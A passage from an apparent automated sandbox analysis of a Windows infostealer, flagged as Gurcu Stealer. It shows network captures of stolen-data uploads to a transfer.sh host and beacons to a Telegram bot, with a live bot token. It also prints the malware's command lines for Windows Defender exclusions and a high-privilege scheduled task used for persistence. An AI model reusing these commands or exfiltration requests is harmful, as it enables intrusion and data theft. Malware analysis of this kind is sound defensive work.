                                                                                                    Data Ascii: t7e2pqamt5AHx7e39zZFUjanEjanAjancUO3t7cQZne3t/anBthXlobmpuQmN7e3t7eXkAfHt7f3NkVSNqcSNqalNge3t9e3t9amoUV3t7cXtzZFVqcSNqcCNqdyMjd3tzeQB8e3t/9RKFf2htam1Bp4aEhH1obEN7e3t7amxRe3t7YEt4e+Z7e3t2e3tqe39TOnt7cXF9Uzl7e3FthXp3c0J8e3t7fVM4e3txXX9TOXt7cXZyQ
                                                                                                    Feb 10, 2024 16:17:08.922015905 CET1286INData Raw: 58 58 74 37 65 32 6c 2b 55 79 6c 37 65 33 46 42 32 34 53 45 68 4b 5a 30 65 33 74 37 61 58 36 46 62 58 68 37 65 32 41 55 55 6e 74 37 63 58 75 6e 65 53 73 55 63 48 74 37 66 58 74 71 66 78 52 77 65 33 74 39 65 33 6b 72 41 48 39 37 65 33 39 54 4b 48
                                                                                                    Data Ascii: XXt7e2l+Uyl7e3FB24SEhKZ0e3t7aX6FbXh7e2AUUnt7cXuneSsUcHt7fXtqfxRwe3t9e3krAH97e39TKHt7cXt8eSsAf3t7f1Mve3txe3l5KwB/e3t/eSsAcnt7f1N+e3t9KnumcXt7e117bWhypkd7e3umVHt7e3t8Uy57e3FocWpxQnx7e3t8Uyh7e3F7c1Mue3txaHBqcEJ8e3t7c1Moe3txe3unbGhyQ3t7e3tqclF7e3t
                                                                                                    Feb 10, 2024 16:17:08.922040939 CET1286INData Raw: 74 78 65 33 6b 41 66 6e 74 37 66 33 4c 31 45 71 70 54 49 33 74 37 63 57 31 6a 46 45 35 37 65 33 46 37 65 51 42 2b 65 33 74 2f 63 2f 55 53 71 6c 4d 6a 65 33 74 78 62 57 4d 55 54 6e 74 37 63 58 74 35 41 48 35 37 65 33 39 74 55 79 4e 37 65 33 46 74
                                                                                                    Data Ascii: txe3kAfnt7f3L1EqpTI3t7cW1jFE57e3F7eQB+e3t/c/USqlMje3txbWMUTnt7cXt5AH57e39tUyN7e3FtYxROe3txe3kAfnt7f21TI3t7cW1jFE57e3F7eQB+e3t/bVMje3txbWMUTnt7cXt5AH57e39be/p7e1Mje3txbWMUTnt7cXt5AH57e395eABue3t/U257e31TInt7cW1hFE57e3F7eQB+e3t/fG189RIUTnt7cXt5A
                                                                                                    Feb 10, 2024 16:17:08.922065973 CET1286INData Raw: 68 48 74 37 65 79 54 75 65 41 42 6a 65 33 74 2f 5a 52 38 61 42 6d 4e 37 65 33 39 37 61 6e 4e 73 49 32 68 7a 61 6e 4d 56 66 42 47 46 66 32 68 79 61 6e 4a 42 75 59 53 45 68 48 4e 38 49 33 64 37 66 47 32 46 65 57 68 78 61 6e 46 42 2f 34 53 45 68 48
                                                                                                    Data Ascii: hHt7eyTueABje3t/ZR8aBmN7e397anNsI2hzanMVfBGFf2hyanJBuYSEhHN8I3d7fG2FeWhxanFB/4SEhHIUQ3t7cXt4AGp7e39lhXpocGpwQnx7e3tyFF97e3F7eF4AY3t7f24aBmN7e394cxUGaHt7f3h5AH57e38UUXt7cWp/IhYVBm97e394AGp7e39lO1J7e3t5AHl7e39BZXt7e38UXnt7cUJoe3t7eABve3t/eABoe3t
                                                                                                    Feb 10, 2024 16:17:08.922091961 CET1286INData Raw: 74 2f 66 67 42 76 65 33 74 2f 62 68 57 46 65 6d 68 79 61 6e 4a 43 61 33 74 37 65 33 35 34 66 57 52 76 49 31 4d 54 65 33 74 78 42 6d 39 37 65 33 39 2b 41 47 35 37 65 33 39 75 46 59 56 36 61 48 46 71 63 55 4a 72 65 33 74 37 66 6e 68 39 5a 47 63 6a
                                                                                                    Data Ascii: t/fgBve3t/bhWFemhyanJCa3t7e354fWRvI1MTe3txBm97e39+AG57e39uFYV6aHFqcUJre3t7fnh9ZGcjUxN7e3EGbnt7f3t7an9kcYV6aHBqcEIIe3t7e3h9ZSNTQHt7cXB4fWRxI1NAe3txd3xsO3F7e3tzZGOFekN6e3t7bWh3andCOnt7e3t+eH1kdyNTE3t7cVMSe3txBmJ7e39+eH1kbyNTE3t7cVMSe3txBmB7e39+e
                                                                                                    Feb 10, 2024 16:17:09.198327065 CET1286INData Raw: 65 33 46 6f 63 48 74 71 64 6d 70 33 46 53 4e 35 41 48 35 37 65 33 38 55 49 58 74 37 63 59 56 36 62 59 56 36 61 47 6c 71 61 55 4a 38 65 33 74 37 62 58 43 6d 42 48 74 37 65 33 6c 71 63 67 5a 7a 65 33 74 2f 65 57 70 78 72 2f 59 6f 65 33 74 36 42 6e
                                                                                                    Data Ascii: e3FocHtqdmp3FSN5AH57e38UIXt7cYV6bYV6aGlqaUJ8e3t7bXCmBHt7e3lqcgZze3t/eWpxr/Yoe3t6Bnx7e395AH57e39qcG0UM3t7cV15AH57e395AHx7e39tanESFDJ7e3FdeQB+e3t/anBtFDN7e3FdbHCmVXt7e3t5AH57e38UUXt7cW0RhXloaGpoQUmFhIR7pnN7e3tde3ume3t7e21wQ3t7e3t8UTpne3t7e3t7Gnt


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449737208.95.112.1807620C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Feb 10, 2024 16:17:17.644812107 CET85OUTGET /line?fields=query,country HTTP/1.1
                                                                                                    Host: ip-api.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Feb 10, 2024 16:17:17.759489059 CET197INHTTP/1.1 200 OK
                                                                                                    Date: Sat, 10 Feb 2024 15:17:17 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 27
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    X-Ttl: 60
                                                                                                    X-Rl: 44
                                                                                                    Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a
                                                                                                    Data Ascii: United States81.181.57.74


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449738185.119.118.5980807620C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Feb 10, 2024 16:17:18.446048021 CET146OUTPUT /41r0r_user%40468325_report.wsr HTTP/1.1
                                                                                                    Host: 185.119.118.59:8080
                                                                                                    Content-Length: 163338
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Feb 10, 2024 16:17:18.661967039 CET25INHTTP/1.1 100 Continue
                                                                                                    Feb 10, 2024 16:17:19.525814056 CET382INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/plain
                                                                                                    Server: Transfer.sh HTTP Server
                                                                                                    X-Made-With: <3 by DutchCoders
                                                                                                    X-Served-By: Proudly served by DutchCoders
                                                                                                    X-Url-Delete: http://185.119.118.59:8080/T4zYCSr1rm/41r0r_user@468325_report.wsr/DvYVp3kcgTvwcwH3NgtP
                                                                                                    Date: Sat, 10 Feb 2024 15:17:19 GMT
                                                                                                    Content-Length: 67
                                                                                                    Data Raw: 68 74 74 70 3a 2f 2f 31 38 35 2e 31 31 39 2e 31 31 38 2e 35 39 3a 38 30 38 30 2f 54 34 7a 59 43 53 72 31 72 6d 2f 34 31 72 30 72 5f 6a 6f 6e 65 73 40 34 36 38 33 32 35 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                                                    Data Ascii: http://185.119.118.59:8080/T4zYCSr1rm/41r0r_user@468325_report.wsr


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449739208.95.112.1808072C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Feb 10, 2024 16:17:18.650660992 CET85OUTGET /line?fields=query,country HTTP/1.1
                                                                                                    Host: ip-api.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Feb 10, 2024 16:17:18.827989101 CET197INHTTP/1.1 200 OK
                                                                                                    Date: Sat, 10 Feb 2024 15:17:18 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 27
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    X-Ttl: 60
                                                                                                    X-Rl: 44
                                                                                                    Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a
                                                                                                    Data Ascii: United States81.181.57.74


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449741185.119.118.5980808072C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Feb 10, 2024 16:17:19.412488937 CET146OUTPUT /hkLYW_user%40468325_report.wsr HTTP/1.1
                                                                                                    Host: 185.119.118.59:8080
                                                                                                    Content-Length: 163024
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Feb 10, 2024 16:17:19.627897024 CET25INHTTP/1.1 100 Continue
                                                                                                    Feb 10, 2024 16:17:20.493516922 CET382INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/plain
                                                                                                    Server: Transfer.sh HTTP Server
                                                                                                    X-Made-With: <3 by DutchCoders
                                                                                                    X-Served-By: Proudly served by DutchCoders
                                                                                                    X-Url-Delete: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user@468325_report.wsr/0CQs5G5XLhl4ycaHU3zO
                                                                                                    Date: Sat, 10 Feb 2024 15:17:20 GMT
                                                                                                    Content-Length: 67
                                                                                                    Data Raw: 68 74 74 70 3a 2f 2f 31 38 35 2e 31 31 39 2e 31 31 38 2e 35 39 3a 38 30 38 30 2f 73 39 56 62 66 65 4a 64 54 73 2f 68 6b 4c 59 57 5f 6a 6f 6e 65 73 40 34 36 38 33 32 35 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                                                    Data Ascii: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user@468325_report.wsr


                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449743149.154.167.2204437620C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-02-10 15:17:20 UTC897OUTGET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-02-10 15:17:20 UTC389INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:20 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1193
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2024-02-10 15:17:20 UTC1193INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 35 32 32 35 31 35 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 36 39 37 37 33 33 34 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 62 30 42 69 67 67 65 73 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 61 63 6b 20 5c 75 32 37 30 38 5c 75 66 65 30 66 20 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 38 22 2c 22 75 73 65 72 6e 61 6d 65
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":19,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449744149.154.167.2204438072C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-02-10 15:17:21 UTC897OUTGET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-02-10 15:17:21 UTC389INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:21 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1193
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2024-02-10 15:17:21 UTC1193INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 35 32 32 35 31 35 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 36 39 37 37 33 33 34 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 62 30 42 69 67 67 65 73 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 61 63 6b 20 5c 75 32 37 30 38 5c 75 66 65 30 66 20 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 38 22 2c 22 75 73 65 72 6e 61 6d 65
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":20,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449745149.154.167.2204437620C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-02-10 15:17:21 UTC604OUTGET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-02-10 15:17:22 UTC389INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:21 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1158
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2024-02-10 15:17:22 UTC1158INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 35 32 32 35 31 35 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 36 39 37 37 33 33 34 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 62 30 42 69 67 67 65 73 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 61 63 6b 20 5c 75 32 37 30 38 5c 75 66 65 30 66 20 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 38 22 2c 22 75 73 65 72 6e 61 6d 65
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":21,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449746149.154.167.2204438072C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-02-10 15:17:22 UTC604OUTGET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-02-10 15:17:22 UTC389INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:22 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1158
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2024-02-10 15:17:22 UTC1158INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 35 32 32 35 31 35 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 36 39 37 37 33 33 34 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 62 30 42 69 67 67 65 73 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 61 63 6b 20 5c 75 32 37 30 38 5c 75 66 65 30 66 20 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 38 22 2c 22 75 73 65 72 6e 61 6d 65
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":22,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:16:16:54
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    Imagebase:0x940000
                                                                                                    File size:14'336 bytes
                                                                                                    MD5 hash:7E9A93C69AECFC2BBDA9470FBD4556DB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:16:16:59
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                                                                                                    Imagebase:0x650000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:16:16:59
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:16:17:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:16:17:09
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                                                                                                    Imagebase:0x1f995eb0000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
